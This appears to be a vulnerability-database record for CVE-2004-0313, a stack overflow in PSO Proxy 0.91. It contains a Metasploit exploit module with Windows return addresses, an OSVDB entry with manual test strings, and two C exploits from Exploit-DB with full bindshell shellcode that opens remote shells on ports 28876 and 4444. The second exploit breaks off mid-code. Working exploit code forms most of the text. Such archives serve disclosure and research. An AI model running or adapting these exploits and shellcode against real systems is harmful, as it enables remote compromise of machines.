ID PACKETSTORM:83235
Type packetstorm
Reporter Patrick Webster
Modified 2009-11-26T00:00:00
Description
`##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'PSO Proxy v0.91 Stack Overflow',
'Description' => %q{
This module exploits a buffer overflow in the PSO Proxy v0.91 web server.
If a client sends an excessively long string the stack is overwritten.
},
'Author' => 'Patrick Webster <patrick@aushack.com>',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-0313' ],
[ 'OSVDB', '4028' ],
[ 'URL', 'http://www.milw0rm.com/exploits/156' ],
[ 'BID', '9706' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 370,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en.
[ 'Windows 2000 Pro SP0-4 English', { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll
[ 'Windows 2000 Pro SP0-4 French', { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll
[ 'Windows 2000 Pro SP0-4 Italian', { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll
[ 'Windows XP Pro SP0/1 English', { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll
],
'Privileged' => false,
'DisclosureDate' => 'Feb 20 2004',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
], self.class)
end
def autofilter
false
end
def check
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
banner = sock.get(-1,3)
if (banner =~ /PSO Proxy 0\.9/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
exploit = rand_text_alphanumeric(1024, payload_badchars)
exploit += [target['Ret']].pack('V') + payload.encoded
sock.put(exploit + "\r\n\r\n")
disconnect
handler
end
end
`
{"id": "PACKETSTORM:83235", "type": "packetstorm", "bulletinFamily": "exploit", "title": "PSO Proxy v0.91 Stack Overflow", "description": "", "published": "2009-11-26T00:00:00", "modified": "2009-11-26T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "https://packetstormsecurity.com/files/83235/PSO-Proxy-v0.91-Stack-Overflow.html", "reporter": "Patrick Webster", "references": [], "cvelist": ["CVE-2004-0313"], "lastseen": "2016-12-05T22:23:03", "viewCount": 1, "enchantments": {"score": {"value": 7.9, "vector": "NONE", "modified": "2016-12-05T22:23:03", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0313"]}, {"type": "exploitdb", "idList": ["EDB-ID:156", "EDB-ID:23732", "EDB-ID:23734", "EDB-ID:23733", "EDB-ID:16790"]}, {"type": "osvdb", "idList": ["OSVDB:4028"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/PSOPROXY91_OVERFLOW"]}], "modified": "2016-12-05T22:23:03", "rev": 2}, "vulnersScore": 7.9}, "sourceHref": "https://packetstormsecurity.com/files/download/83235/psoproxy91_overflow.rb.txt", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'PSO Proxy v0.91 Stack Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in the PSO Proxy v0.91 web server. \nIf a client sends an excessively long string the stack is overwritten. \n}, \n'Author' => 'Patrick Webster <patrick@aushack.com>', \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2004-0313' ], \n[ 'OSVDB', '4028' ], \n[ 'URL', 'http://www.milw0rm.com/exploits/156' ], \n[ 'BID', '9706' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 370, \n'BadChars' => \"\\x00\\x0a\\x0d\\x20\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Patrick - Tested OK 2007/09/06 against w2ksp0, w2ksp4, xpsp0,xpsp2 en. \n[ 'Windows 2000 Pro SP0-4 English', { 'Ret' => 0x75023112 } ], # call ecx ws2help.dll \n[ 'Windows 2000 Pro SP0-4 French', { 'Ret' => 0x74fa3112 } ], # call ecx ws2help.dll \n[ 'Windows 2000 Pro SP0-4 Italian', { 'Ret' => 0x74fd3112 } ], # call ecx ws2help.dll \n[ 'Windows XP Pro SP0/1 English', { 'Ret' => 0x71aa396d } ], # call ecx ws2help.dll \n[ 'Windows XP Pro SP2 English', { 'Ret' => 0x71aa3de3 } ], # call ecx ws2help.dll \n], \n'Privileged' => false, \n'DisclosureDate' => 'Feb 20 2004', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \n], self.class) \nend \n \ndef autofilter \nfalse \nend \n \ndef check \nconnect \nsock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\") \nbanner = sock.get(-1,3) \nif (banner =~ /PSO Proxy 0\\.9/) \nreturn Exploit::CheckCode::Vulnerable \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect \n \nexploit = rand_text_alphanumeric(1024, payload_badchars) \nexploit += [target['Ret']].pack('V') + payload.encoded \n \nsock.put(exploit + \"\\r\\n\\r\\n\") \n \ndisconnect \nhandler \nend \nend \n`\n"}
{"cve": [{"lastseen": "2020-10-03T11:33:38", "description": "Buffer overflow in PSOProxy 0.91 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long HTTP request, as demonstrated using a long (1) GET argument or (2) method name.", "edition": 3, "cvss3": {}, "published": "2004-11-23T05:00:00", "title": "CVE-2004-0313", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0313"], "modified": "2017-07-11T01:30:00", "cpe": ["cpe:/a:psoproxy:psoproxy_server:0.91"], "id": "CVE-2004-0313", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0313", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:psoproxy:psoproxy_server:0.91:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:19:58", "bulletinFamily": "software", "cvelist": ["CVE-2004-0313"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in PSOProxy. The program fails to handle long HTTP GET or method name requests resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in PSOProxy. The program fails to handle long HTTP GET or method name requests resulting in a buffer overflow. With a specially crafted request, an attacker can cause the execution of arbitrary code.\n## Manual Testing Notes\nTo test the vulnerability send to the server a string like:\n\nGET /aaaa[ 942 of a ]aaaa HTTP/1.1\n\nor:\n\nGET aaaa[ 942 of a ]aaaa HTTP/1.1\n\nor:\n\naaaa[ 1035 of a ]aaaa\n\n\n\n\n## References:\nVendor URL: http://psoproxy.sourceforge.net/\n[Secunia Advisory ID:10948](https://secuniaresearch.flexerasoftware.com/advisories/10948/)\nOther Advisory URL: http://marc.theaimsgroup.com/?l=bugtraq&m=107756005123920&w=2\nOther Advisory URL: http://marc.theaimsgroup.com/?l=bugtraq&m=107730731900261&w=2\nKeyword: PSOProxy,Overflow\nISS X-Force ID: 15275\nGeneric Exploit URL: http://www.securityfocus.com/data/vulnerabilities/exploits/pso-exploit.c\nGeneric Exploit URL: http://www.securityfocus.com/data/vulnerabilities/exploits/PSOProxy-exp.c\n[CVE-2004-0313](https://vulners.com/cve/CVE-2004-0313)\nBugtraq ID: 9706\n", "modified": "2004-02-20T09:03:31", "published": "2004-02-20T09:03:31", "href": "https://vulners.com/osvdb/OSVDB:4028", "id": "OSVDB:4028", "type": "osvdb", "title": "PSOProxy Long HTTP Request Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T11:49:53", "description": "PSOProxy 0.91 Remote Buffer Overflow Exploit (Win2k/XP). CVE-2004-0313. Remote exploit for windows platform", "published": "2004-02-26T00:00:00", "type": "exploitdb", "title": "PSOProxy 0.91 - Remote Buffer Overflow Exploit Win2k/XP", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0313"], "modified": "2004-02-26T00:00:00", "id": "EDB-ID:156", "href": "https://www.exploit-db.com/exploits/156/", "sourceData": "/*\r\n\r\n\t Copyright \u00a9 Rosiello Security\r\n\r\n \t http www rosiello org\r\n \t ================\r\n\r\n -== Remote Exploit for PSOProxy version v0.91 ==--\r\n Code by: rave\r\n Contact: rave@rosiello.org\r\n Date: Feb 2004\r\n Bug found by: Donato Ferrante\r\n\r\n There is a vulnerability found in the PSOProxy server.\r\n An attacker can execute arbitrary code exploiting remotely a buffer overflow.\r\n\r\n\tThe exploit sends:\r\n\r\n GET / <1021 x A><adres of the shellcode><shellcode>\r\n\r\n This spawns a bindshell on the victim at port 28876..\r\n\r\n\r\n Usage <C:\\>psoproxy-exploit.exe <target host> <target number>\r\n Target Number Target Name Stack Adress\r\n ============= =========== ===========\r\n 0 Demo 0xBADC0DED\r\n 1 Windows XP Home Edtion SP1. 0x00D2FDDA\r\n 2 Windows XP Pro Edtion SP1. 0x00EDFDDC\r\n 3 Win2k Pro Edtion. 0x00BBFDDC\r\n\r\n\r\n\r\n <C:\\> psoproxy-exploit localhost 1\r\n [+] Winsock Inalized\r\n [+] Trying to connect to localhost:8080\r\n [+] socket inalized\r\n [+] Overflowing string is Prepared\r\n [+] Connected.\r\n [+] Overflowing string had been send\r\n\r\n\r\n <C:\\> telnet localhost 28876\r\n Microsoft Windows XP [versie 5.1.2600]\r\n (C) Copyright 1985-2001 Microsoft Corp.\r\n\r\n <D:\\>\r\n\r\n DO NOT USE THIS CODE ON DIFFERENT MACHINES BUT YOURS!!!\r\n Respect the law as we do!\r\n\r\n\r\n\r\n\r\n Special Tankz to:\r\n opy { win2k 0wnage !! ty for lending me ur box }\r\n B0f { Hope to work with u again in the futhure like we do all the time }\r\n Dragnet { Always willing to help me out }\r\n Angelo { Verry good maffio`so }\r\n\r\n\r\n Greetz go out to:\r\n Kajun { Verry suportive guy }\r\n NrAziz { 0wns pakistan hax0r scene ! beware always say mr NrAziz }\r\n sloth { good guy }\r\n Mercy { Hope to see u soon }\r\n Netric security {www.netric.org/.de }\r\n [+] All the hax0rs i forgot.\r\n\r\n Hate Messages:\r\n Ziphie { U didnt get mine bitch }\r\n\r\n OOh and Li0n7 voila fr {\r\n you're doing it all wrong, your exploit doesn't work!\r\n http://www.securityfocus.com/archive/1/354769/2004-02-15/2004-02-21/0\r\n k/j man, keep on doing the good stuff and next time add some more stack adresses so\r\n it would work on other os`s...\r\n\r\n }\r\n\r\n\r\n\r\nAdvisory at: http://www.rosiello.org/en/read_bugs.php?15\r\n\r\n*/\r\n\r\n\r\n#include <stdio.h>\r\n#include <winsock2.h>\r\n#include <errno.h>\r\n#include <windows.h>\r\n\r\n// Darn fucking 1337 macro shit\r\n#define ISIP(m) (!(inet_addr(m) ==-1))\r\n\r\n#define offset 1024 //1024\r\n\r\n\r\n\r\n\r\n\r\nstruct remote_targets {\r\n char *os;\r\n unsigned long sh_addr;\r\n} target [] ={\r\n/* Option`s for your eyes only :D*/\r\n \"Demo \",\r\n 0xbadc0ded,\r\n\r\n\r\n \"Windows XP Home Edtion SP1. \",\r\n 0x00D2FDDA,\r\n\r\n \"Windows XP Pro Edtion SP1. \",\r\n 0x00edfddc,\r\n\r\n\r\n \"Win2k Pro Edtion. \",\r\n 0x00bbfddc,\r\n\r\n };\r\n\r\n\r\n\r\n\r\n\r\n\r\n//Bindcode spawns a binshell on port 28876 (Thanks to metasploit.com guys)\r\nunsigned char shellcode[] =\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\xeb\\x43\\x56\\x57\\x8b\\x45\\x3c\\x8b\\x54\\x05\\x78\\x01\\xea\\x52\\x8b\\x52\"\r\n \"\\x20\\x01\\xea\\x31\\xc0\\x31\\xc9\\x41\\x8b\\x34\\x8a\\x01\\xee\\x31\\xff\\xc1\"\r\n \"\\xcf\\x13\\xac\\x01\\xc7\\x85\\xc0\\x75\\xf6\\x39\\xdf\\x75\\xea\\x5a\\x8b\\x5a\"\r\n \"\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\"\r\n \"\\xe8\\x5f\\x5e\\xff\\xe0\\xfc\\x31\\xc0\\x64\\x8b\\x40\\x30\\x8b\\x40\\x0c\\x8b\"\r\n \"\\x70\\x1c\\xad\\x8b\\x68\\x08\\x31\\xc0\\x66\\xb8\\x6c\\x6c\\x50\\x68\\x33\\x32\"\r\n \"\\x2e\\x64\\x68\\x77\\x73\\x32\\x5f\\x54\\xbb\\x71\\xa7\\xe8\\xfe\\xe8\\x90\\xff\"\r\n \"\\xff\\xff\\x89\\xef\\x89\\xc5\\x81\\xc4\\x70\\xfe\\xff\\xff\\x54\\x31\\xc0\\xfe\"\r\n \"\\xc4\\x40\\x50\\xbb\\x22\\x7d\\xab\\x7d\\xe8\\x75\\xff\\xff\\xff\\x31\\xc0\\x50\"\r\n \"\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xbb\\xa6\\x55\\x34\\x79\\xe8\\x61\\xff\\xff\"\r\n \"\\xff\\x89\\xc6\\x31\\xc0\\x50\\x50\\x35\\x02\\x01\\x70\\xcc\\xfe\\xcc\\x50\\x89\"\r\n \"\\xe0\\x50\\x6a\\x10\\x50\\x56\\xbb\\x81\\xb4\\x2c\\xbe\\xe8\\x42\\xff\\xff\\xff\"\r\n \"\\x31\\xc0\\x50\\x56\\xbb\\xd3\\xfa\\x58\\x9b\\xe8\\x34\\xff\\xff\\xff\\x58\\x60\"\r\n \"\\x6a\\x10\\x54\\x50\\x56\\xbb\\x47\\xf3\\x56\\xc6\\xe8\\x23\\xff\\xff\\xff\\x89\"\r\n \"\\xc6\\x31\\xdb\\x53\\x68\\x2e\\x63\\x6d\\x64\\x89\\xe1\\x41\\x31\\xdb\\x56\\x56\"\r\n \"\\x56\\x53\\x53\\x31\\xc0\\xfe\\xc4\\x40\\x50\\x53\\x53\\x53\\x53\\x53\\x53\\x53\"\r\n \"\\x53\\x53\\x53\\x6a\\x44\\x89\\xe0\\x53\\x53\\x53\\x53\\x54\\x50\\x53\\x53\\x53\"\r\n \"\\x43\\x53\\x4b\\x53\\x53\\x51\\x53\\x87\\xfd\\xbb\\x21\\xd0\\x05\\xd0\\xe8\\xdf\"\r\n \"\\xfe\\xff\\xff\\x5b\\x31\\xc0\\x48\\x50\\x53\\xbb\\x43\\xcb\\x8d\\x5f\\xe8\\xcf\"\r\n \"\\xfe\\xff\\xff\\x56\\x87\\xef\\xbb\\x12\\x6b\\x6d\\xd0\\xe8\\xc2\\xfe\\xff\\xff\"\r\n \"\\x83\\xc4\\x5c\\x61\\xeb\\x89\\x41\";\r\n\r\n\r\n// now what would this button do ?\r\nchar *host_ip;\r\nu_long get_ip(char *hostname)\r\n{\r\n struct hostent *hp;\r\n\r\n if (ISIP(hostname)) return inet_addr(hostname);\r\n\r\n if ((hp = gethostbyname(hostname))==NULL)\r\n { perror (\"[+] gethostbyname() failed check the existance of the host.\\n\");\r\n exit(-1); }\r\n\r\n return (inet_ntoa(*((struct in_addr *)hp->h_addr)));\r\n}\r\n\r\n\r\n/// oooh yeah uuuh right ....\r\nint usage (char *what)\r\n{\r\n int i;\r\n fprintf(stdout,\"Copyright \u00a9 Rosiello Security\\n\");\r\n fprintf(stdout,\"http://www.rosiello.org\\n\\n\");\r\n fprintf(stdout,\"Usage %s <target host> <target number>\\n\",what);\r\n fprintf(stdout,\"Target Number\\t\\tTarget Name\\t\\t\\t\\tStack Adress\\n\");\r\n fprintf(stdout,\"=============\\t\\t===========\\t\\t\\t\\t===========\\n\");\r\n\r\n for (i=0;i < 4;i++)\r\n fprintf(stdout,\"%d\\t\\t\\t%s\\t\\t0x%p\\n\",i,target[i].os,target[i].sh_addr);\r\n\r\n exit(0);\r\n}\r\n\r\nint main(int argc,char **argv)\r\n\r\n{\r\n\r\n\r\nchar buffer[offset*2]=\"get /\",*ptr,*address;\r\nint sd,oops,i,choise;\r\nstruct sockaddr_in ooh;\r\n\r\n\r\nWSADATA wsadata;\r\nWSAStartup(0x101, &wsadata);\r\n\r\nif (argc < 2) usage(argv[0]);\r\naddress=argv[1];\r\nchoise=atoi(argv[2]);\r\n\r\nfprintf(stdout,\"[+] Winsock Inalized\\n\");\r\n\r\n /* Lets start making a litle setup\r\n Change the port if you have to */\r\n\r\n ooh.sin_addr.s_addr = inet_addr(get_ip(address));\r\n ooh.sin_port = htons(8080);\r\n ooh.sin_family = AF_INET;\r\n\r\n\r\nfprintf(stdout,\"[+] Trying to connect to %s:%d\\n\",address,8080);\r\n\r\n\r\n// ok ok here`s ur sock()\r\nsd = socket(AF_INET, SOCK_STREAM,IPPROTO_TCP);\r\n if (!sd<0) { fprintf(stderr,\"[!] socket() failed.\\n\");exit (-1); }\r\n\r\n fprintf(stdout,\"[+] socket inalized\\n\");\r\n\r\n\r\n /* initializing the expploiting buffer, read the file comments for the details */\r\nptr=buffer+strlen(buffer);\r\n\r\nfor (i=strlen(buffer);i < offset;i++) *ptr++=(char)0x2e;\r\nfor (i=strlen(buffer);i < offset+6;i++) { *ptr++=(char)0xa; *ptr++=(char)0xd ;}\r\n\r\nmemcpy(buffer+strlen(buffer),((char *)&shellcode),strlen(shellcode));\r\nmemcpy(buffer+offset,((char *)&target[choise].sh_addr),3);\r\n\r\n\r\nfprintf(stdout,\"[+] Overflowing string is Prepared\\n\");\r\n\r\n // Knock knock ... hi i want to hook up with you\r\n oops=connect(sd, (struct sockaddr *)&ooh, sizeof( ooh ));\r\n if(oops!=0) { fprintf(stderr,\"[!] connect() failed.\\n\"); exit(-1); }\r\n\r\n// yep we are in :D\r\nfprintf(stdout,\"[+] Connected.\\n\");\r\n\r\n\r\n// Sending some Dangerous stuff\r\ni = send(sd,buffer,strlen(buffer),0);\r\nif (!i <0) { fprintf (stdout,\"[!] Send() failed\\n\"); exit (-1) ; }\r\n\r\nfprintf(stdout,\"[+] Overflowing string had been send\\n\");\r\n\r\n\r\n/* May psoproxy rest in peace (have cold a nice one and telnet to <host> 28876\r\n\r\n <C:\\> telnet localhost 28876\r\n Microsoft Windows XP [versie 5.1.2600]\r\n (C) Copyright 1985-2001 Microsoft Corp.\r\n\r\n D:\\>\r\n*/\r\n\r\n\r\n// the cleaners !!\r\nWSACleanup();\r\n\r\n// [EOF]\r\nreturn 0;\r\n\r\n}\r\n\r\n// milw0rm.com [2004-02-26]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/156/"}, {"lastseen": "2016-02-02T21:40:48", "description": "PSOProxy 0.91 Remote Buffer Overflow Vulnerability (1). CVE-2004-0313. Remote exploit for windows platform", "published": "2004-02-20T00:00:00", "type": "exploitdb", "title": "PSOProxy 0.91 - Remote Buffer Overflow Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0313"], "modified": "2004-02-20T00:00:00", "id": "EDB-ID:23732", "href": "https://www.exploit-db.com/exploits/23732/", "sourceData": "source: http://www.securityfocus.com/bid/9706/info\r\n\r\nIt has been reported that PSOProxy is prone to a remote buffer overflow vulnerability. The issue is due to the insufficient boundary checking.\r\n\r\nA malicious user may exploit this condition to potentially corrupt sensitive process memory in the affected process and ultimately execute arbitrary code with the privileges of the web server. \r\n\r\n/*\r\n** Voici mon 1er exploit, il traite d'une faille dans le programme PSOProxy v0.91\r\n** Il s'agit d'un buffer overflow type et facile a faire (c pour <E7>a que j'ai r<E9>ussi ^^)\r\n**\r\n** Pour des infos tecniques aller ici : http://seclists.org/lists/bugtraq/2004/Feb/0567.html\r\n**\r\n** Sinon l'exploit consiste en : 1. on ce connecte au pc distnant\r\n** 2. on envoit le code malicieux\r\n** 3. un shell souvre sur le port 4444\r\n** Teste sous xp sp1.\r\n**\r\n**\r\n** Merci a Vendame qui m'as d<E9>bloqu<E9> et a CRPT.\r\n**\r\n** Merci aussi a ceux qui font pas chier et qui se prenne pas pour dieux.\r\n**\r\n** ps : prochaine version bientot disponible.\r\n** ps2 : j'ai bien comment<E9> le code pour que ceux qui veulent apprendre apprennent\r\n** ps3 : Je ne cherche qu'<E0> m'am<E9>lior<E9>, alors si vous avez des sugestions, des modifications,\r\n** je suis la pour les recevoir :).\r\n**\r\n** Coded By PaLbOsA\r\n*/\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n#include <winsock2.h>\r\n#include <windows.h>\r\n\r\n#pragma comment(lib, \"ws2_32.lib\")\r\nvoid intro(){\r\n printf(\"***************************************************\\n\");\r\n printf(\"* PSOProxy v0.91 Exploit *\\n\");\r\n printf(\"* Coded By PaLbOsA *\\n\");\r\n printf(\"* *\\n\");\r\n printf(\"* C mon premier exploit, alors soyez indulgent :) *\\n\");\r\n printf(\"* *\\n\");\r\n printf(\"* Un grand Merci a vendame et a CRPT. *\\n\");\r\n printf(\"***************************************************\\n\");\r\n}\r\n\r\nvoid main(int argc, char *argv[])\r\n{\r\n\r\nchar buffer[3000]; // on prend un bon gros buffer :>\r\n\r\nchar ip[30]; // a ton avis?\r\n\r\nchar shellcode[]= // Ouvre le port 4444 en <E9>coute\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xeb\\x19\\x5e\\x31\\xc9\\x81\\xe9\\x89\\xff\"\r\n \"\\xff\\xff\\x81\\x36\\x80\\xbf\\x32\\x94\\x81\\xee\\xfc\\xff\\xff\\xff\\xe2\\xf2\"\r\n \"\\xeb\\x05\\xe8\\xe2\\xff\\xff\\xff\\x03\\x53\\x06\\x1f\\x74\\x57\\x75\\x95\\x80\"\r\n \"\\xbf\\xbb\\x92\\x7f\\x89\\x5a\\x1a\\xce\\xb1\\xde\\x7c\\xe1\\xbe\\x32\\x94\\x09\"\r\n \"\\xf9\\x3a\\x6b\\xb6\\xd7\\x9f\\x4d\\x85\\x71\\xda\\xc6\\x81\\xbf\\x32\\x1d\\xc6\"\r\n \"\\xb3\\x5a\\xf8\\xec\\xbf\\x32\\xfc\\xb3\\x8d\\x1c\\xf0\\xe8\\xc8\\x41\\xa6\\xdf\"\r\n \"\\xeb\\xcd\\xc2\\x88\\x36\\x74\\x90\\x7f\\x89\\x5a\\xe6\\x7e\\x0c\\x24\\x7c\\xad\"\r\n \"\\xbe\\x32\\x94\\x09\\xf9\\x22\\x6b\\xb6\\xd7\\x4c\\x4c\\x62\\xcc\\xda\\x8a\\x81\"\r\n \"\\xbf\\x32\\x1d\\xc6\\xab\\xcd\\xe2\\x84\\xd7\\xf9\\x79\\x7c\\x84\\xda\\x9a\\x81\"\r\n \"\\xbf\\x32\\x1d\\xc6\\xa7\\xcd\\xe2\\x84\\xd7\\xeb\\x9d\\x75\\x12\\xda\\x6a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\xa3\\xcd\\xe2\\x84\\xd7\\x96\\x8e\\xf0\\x78\\xda\\x7a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\x9f\\xcd\\xe2\\x84\\xd7\\x96\\x39\\xae\\x56\\xda\\x4a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\x9b\\xcd\\xe2\\x84\\xd7\\xd7\\xdd\\x06\\xf6\\xda\\x5a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\x97\\xcd\\xe2\\x84\\xd7\\xd5\\xed\\x46\\xc6\\xda\\x2a\\x80\"\r\n \"\\xbf\\x32\\x1d\\xc6\\x93\\x01\\x6b\\x01\\x53\\xa2\\x95\\x80\\xbf\\x66\\xfc\\x81\"\r\n \"\\xbe\\x32\\x94\\x7f\\xe9\\x2a\\xc4\\xd0\\xef\\x62\\xd4\\xd0\\xff\\x62\\x6b\\xd6\"\r\n \"\\xa3\\xb9\\x4c\\xd7\\xe8\\x5a\\x96\\x80\\xae\\x6e\\x1f\\x4c\\xd5\\x24\\xc5\\xd3\"\r\n \"\\x40\\x64\\xb4\\xd7\\xec\\xcd\\xc2\\xa4\\xe8\\x63\\xc7\\x7f\\xe9\\x1a\\x1f\\x50\"\r\n \"\\xd7\\x57\\xec\\xe5\\xbf\\x5a\\xf7\\xed\\xdb\\x1c\\x1d\\xe6\\x8f\\xb1\\x78\\xd4\"\r\n \"\\x32\\x0e\\xb0\\xb3\\x7f\\x01\\x5d\\x03\\x7e\\x27\\x3f\\x62\\x42\\xf4\\xd0\\xa4\"\r\n \"\\xaf\\x76\\x6a\\xc4\\x9b\\x0f\\x1d\\xd4\\x9b\\x7a\\x1d\\xd4\\x9b\\x7e\\x1d\\xd4\"\r\n \"\\x9b\\x62\\x19\\xc4\\x9b\\x22\\xc0\\xd0\\xee\\x63\\xc5\\xea\\xbe\\x63\\xc5\\x7f\"\r\n \"\\xc9\\x02\\xc5\\x7f\\xe9\\x22\\x1f\\x4c\\xd5\\xcd\\x6b\\xb1\\x40\\x64\\x98\\x0b\"\r\n \"\\x77\\x65\\x6b\\xd6\\x93\\xcd\\xc2\\x94\\xea\\x64\\xf0\\x21\\x8f\\x32\\x94\\x80\"\r\n \"\\x3a\\xf2\\xec\\x8c\\x34\\x72\\x98\\x0b\\xcf\\x2e\\x39\\x0b\\xd7\\x3a\\x7f\\x89\"\r\n \"\\x34\\x72\\xa0\\x0b\\x17\\x8a\\x94\\x80\\xbf\\xb9\\x51\\xde\\xe2\\xf0\\x90\\x80\"\r\n \"\\xec\\x67\\xc2\\xd7\\x34\\x5e\\xb0\\x98\\x34\\x77\\xa8\\x0b\\xeb\\x37\\xec\\x83\"\r\n \"\\x6a\\xb9\\xde\\x98\\x34\\x68\\xb4\\x83\\x62\\xd1\\xa6\\xc9\\x34\\x06\\x1f\\x83\"\r\n \"\\x4a\\x01\\x6b\\x7c\\x8c\\xf2\\x38\\xba\\x7b\\x46\\x93\\x41\\x70\\x3f\\x97\\x78\"\r\n \"\\x54\\xc0\\xaf\\xfc\\x9b\\x26\\xe1\\x61\\x34\\x68\\xb0\\x83\\x62\\x54\\x1f\\x8c\"\r\n \"\\xf4\\xb9\\xce\\x9c\\xbc\\xef\\x1f\\x84\\x34\\x31\\x51\\x6b\\xbd\\x01\\x54\\x0b\"\r\n \"\\x6a\\x6d\\xca\\xdd\\xe4\\xf0\\x90\\x80\\x2f\\xa2\\x04\";\r\n\r\n\r\nWSADATA WSAData; // On initialise une variable du type WSDATA\r\nSOCKET sock; // on initialise une variable de type sock --> le socket :)\r\nSOCKADDR_IN sinf; // variable qui contien les infos 